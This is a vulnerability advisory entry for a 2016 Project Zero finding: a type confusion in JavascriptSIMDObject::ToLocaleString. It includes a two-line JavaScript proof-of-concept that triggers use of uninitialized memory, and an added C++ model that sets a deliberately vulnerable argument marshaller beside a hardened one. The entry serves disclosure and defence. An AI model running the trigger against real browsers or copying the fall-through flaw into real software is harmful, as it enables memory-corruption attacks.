vendor:
Chromium
by:
Project Zero
7.5
CVSS
HIGH
Type Confusion
843
CWE
Product Name: Chromium
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016
JavascriptSIMDObject::ToLocaleString Type Confusion
In JavascriptSIMDObject::ToLocaleString, if the call has more than three arguments the argument handling falls through, leaving newArgs uninitialized. toLocaleString is then invoked on uninitialized memory, with an effect similar to type confusion: integers left in that memory can be taken for pointers and vice versa. A minimal PoC is as follows (a full PoC is attached to the original report):

var v = SIMD.Int32x4(1, 2, 3, 4);
v.toLocaleString(1, 2, 3, 4, 5, 6, 7);
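The following is an added example, not ChakraCore or Chromium source and not part of the original report: a simplified C++ model of the pattern described above, where a switch on the argument count fills a fixed local buffer and has no branch for calls with more than three arguments. The names Var, Args, newArgs, kUndefined, marshal_vulnerable, marshal_fixed and stale_slots, the three-slot layout and the tagged-integer encoding are all assumptions made for illustration. The vulnerable shape sits beside a hardened one, and stale_slots shows how a practitioner can instrument the pattern without reading indeterminate memory: it pre-fills the buffer with a recognizable pattern standing in for leftover stack data and counts the slots the marshaller never assigned.

```cpp
// Added example: simplified model of the argument-marshalling pattern the
// report describes. NOT ChakraCore/Chromium source; Var, Args, newArgs,
// kUndefined and the 3-slot layout are assumptions made for illustration.
#include <array>
#include <cstddef>
#include <cstdint>
#include <vector>

using Var = std::uintptr_t;          // hypothetical tagged value (odd = small int)
constexpr Var kUndefined = 0;        // hypothetical encoding of 'undefined'
constexpr std::size_t kSlots = 3;    // the callee expects at most three arguments

struct Args {
    std::size_t count;               // arguments in the call, excluding 'this'
    const Var* values;
};

// Vulnerable shape: a switch keyed on the argument count populates newArgs,
// but has no branch for counts above three. Such a call writes nothing, and
// the caller goes on to use newArgs as if it had been filled.
void marshal_vulnerable(const Args& args, std::array<Var, kSlots>& newArgs) {
    switch (args.count) {
    case 0: newArgs = {kUndefined, kUndefined, kUndefined}; break;
    case 1: newArgs = {args.values[0], kUndefined, kUndefined}; break;
    case 2: newArgs = {args.values[0], args.values[1], kUndefined}; break;
    case 3: newArgs = {args.values[0], args.values[1], args.values[2]}; break;
    // no default: count >= 4 falls out of the switch with newArgs untouched
    }
}

// Hardened shape: every count is handled. Surplus arguments are ignored and
// every slot is assigned, so newArgs never carries stale stack contents.
void marshal_fixed(const Args& args, std::array<Var, kSlots>& newArgs) {
    newArgs.fill(kUndefined);
    const std::size_t n = args.count < kSlots ? args.count : kSlots;
    for (std::size_t i = 0; i < n; ++i) newArgs[i] = args.values[i];
}

// Pattern standing in for leftover stack data. In the real engine those
// words are whatever earlier frames left behind, which is why reading them
// mixes integers and pointers.
constexpr Var kStale = static_cast<Var>(0xA5A5A5A5A5A5A5A5ull);

// Instrumented check: pre-fill the local buffer with kStale, run one
// marshaller for a call with `argc` arguments, and report how many slots
// still hold the pattern afterwards (0 means every slot was assigned).
std::size_t stale_slots(std::size_t argc, bool hardened) {
    std::vector<Var> values(argc);
    for (std::size_t i = 0; i < argc; ++i)
        values[i] = static_cast<Var>(2 * i + 1) | 1;   // constructed tagged small ints
    std::array<Var, kSlots> newArgs;
    newArgs.fill(kStale);
    const Args call{argc, values.data()};
    if (hardened) marshal_fixed(call, newArgs);
    else          marshal_vulnerable(call, newArgs);
    std::size_t stale = 0;
    for (Var v : newArgs)
        if (v == kStale) ++stale;
    return stale;
}

int main() {
    // Mirrors the PoC's seven-argument call: the vulnerable shape leaves all
    // three slots stale, the hardened shape leaves none.
    return (stale_slots(7, false) == kSlots && stale_slots(7, true) == 0) ? 0 : 1;
}
```

The point of the instrumented check is that the defect is triggered purely by argument count, never by argument values, so a reviewer can audit such a marshaller by asking whether every possible count assigns every slot the callee later reads.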
Mitigation:
Apply the vendor patch. The fix belongs in the engine: JavascriptSIMDObject::ToLocaleString must handle calls with more than three arguments (by initializing newArgs for that case or bounding the argument count) instead of falling through with newArgs uninitialized. Caller-side care over the argument values does not help, since the bug is triggered by the argument count alone.